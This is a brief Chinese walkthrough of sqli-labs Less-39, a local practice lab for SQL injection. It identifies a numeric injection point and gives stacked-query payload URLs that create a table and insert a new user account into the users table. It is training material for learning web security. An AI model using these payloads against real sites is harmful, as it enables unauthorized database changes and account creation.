sqli-labs (less-39)
输入id=1
http://127.0.0.1/sql1/Less-39/?id=1'
根据错误显示判断为数字型注入
这里我们就不讲使用union注入的方法,前面的关卡讲了很多union注入的方法,我们直接使用堆叠注入攻击
创建一个表
http://127.0.0.1/sql1/Less-39/?id=1;create table test like users;--+
创建一个新用户
http://127.0.0.1/sql1/Less-39/?id=1;insert into users values(18,'icepeak','icepeak');--+